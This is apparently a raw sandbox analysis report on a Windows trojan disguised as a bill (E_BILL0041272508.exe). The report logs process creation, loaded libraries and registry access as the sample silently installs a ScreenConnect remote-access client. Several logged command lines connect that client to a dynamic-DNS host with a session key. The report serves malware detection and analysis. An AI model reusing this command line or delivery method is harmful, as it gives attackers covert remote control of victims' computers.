                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                  System Summary

                  barindex
                  Source: initial sampleStatic PE information: Filename: E_BILL0041272508.exe
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeCode function: 8_2_05C02180 CreateProcessAsUserW,8_2_05C02180
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009BA4950_2_009BA495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347C24712_2_00007FFD347C2471
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347AD5B52_2_00007FFD347AD5B5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347C31B82_2_00007FFD347C31B8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347A329D2_2_00007FFD347A329D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347B5D9A2_2_00007FFD347B5D9A
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347A9D9D2_2_00007FFD347A9D9D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD3479AEF52_2_00007FFD3479AEF5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347AAE5F2_2_00007FFD347AAE5F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347A97382_2_00007FFD347A9738
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347B28502_2_00007FFD347B2850
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347B31112_2_00007FFD347B3111
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347912112_2_00007FFD34791211
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347961782_2_00007FFD34796178
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD3479F4512_2_00007FFD3479F451
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347B4F172_2_00007FFD347B4F17
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeCode function: 8_2_05C0B0508_2_05C0B050
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD347771389_2_00007FFD34777138
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD347827559_2_00007FFD34782755
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD347820B09_2_00007FFD347820B0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD347710CF9_2_00007FFD347710CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD347710D79_2_00007FFD347710D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A8BD349_2_00007FFD34A8BD34
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A8DD9D9_2_00007FFD34A8DD9D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A857319_2_00007FFD34A85731
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A859449_2_00007FFD34A85944
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A8022D9_2_00007FFD34A8022D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A8D1D49_2_00007FFD34A8D1D4
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A86E3D9_2_00007FFD34A86E3D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A85D9C9_2_00007FFD34A85D9C
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A800589_2_00007FFD34A80058
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A85F869_2_00007FFD34A85F86
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A802F29_2_00007FFD34A802F2
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A803289_2_00007FFD34A80328
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A802C09_2_00007FFD34A802C0
                  Source: E_BILL0041272508.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll0.2.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: ScreenConnect.ClientService.dll.2.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal72.troj.evad.winEXE@11/68@3/2
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009B1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCommand line argument: dfshim0_2_009B1000
                  Source: E_BILL0041272508.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: E_BILL0041272508.exeReversingLabs: Detection: 18%
                  Source: E_BILL0041272508.exeVirustotal: Detection: 13%
                  Source: unknownProcess created: C:\Users\user\Desktop\E_BILL0041272508.exe "C:\Users\user\Desktop\E_BILL0041272508.exe"
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" "RunRole" "83265b87-0d31-430d-be3a-51c1a25f31d5" "User"
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" "RunRole" "83265b87-0d31-430d-be3a-51c1a25f31d5" "User"Jump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
